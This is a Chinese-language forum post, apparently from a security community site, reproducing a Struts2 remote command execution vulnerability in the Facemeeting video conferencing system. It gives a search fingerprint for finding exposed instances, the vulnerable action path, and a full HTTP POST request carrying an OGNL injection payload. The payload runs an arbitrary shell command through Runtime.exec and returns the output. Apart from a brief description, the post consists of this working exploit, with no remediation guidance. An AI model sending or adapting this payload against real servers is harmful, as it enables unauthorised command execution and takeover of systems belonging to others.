问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Facemeeting 视频会议系统 Struts2 远程命令执行漏洞
# Facemeeting 视频会议系统 Struts2 远程命令执行漏洞 ## 漏洞描述 Facemeeting 视频会议系统 Struts2组件存在远程命令执行漏洞,通过漏洞攻击者可执行任意命令获取服务器权限 ## 漏...
Facemeeting 视频会议系统 Struts2 远程命令执行漏洞 =================================== 漏洞描述 ---- Facemeeting 视频会议系统 Struts2组件存在远程命令执行漏洞,通过漏洞攻击者可执行任意命令获取服务器权限 漏洞影响 ---- Facemeeting 视频会议系统 网络测绘 ---- app="Facemeeting-视频会议系统" 漏洞复现 ---- 登录页面 ![img](https://shs3.b.qianxin.com/butian_public/f534106d3441f4ea145ab3faf25199882e9d2881e7a45.jpg) 存在漏洞的路径为 ```python /confinfoaction!showallConfinfos.action ``` 发送请求包 ```python POST /confinfoaction!showallConfinfos.action HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Content-Type: application/x-www-form-urlencoded Content-Length: 669 Host: Connection: Keep-Alive ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ipconfig\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d)) ``` ![img](https://shs3.b.qianxin.com/butian_public/f444800f395b57ecde2a432098793a561739d2c0d2da0.jpg)
发表于 2024-07-12 18:45:54
阅读 ( 968 )
分类:
Web应用
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!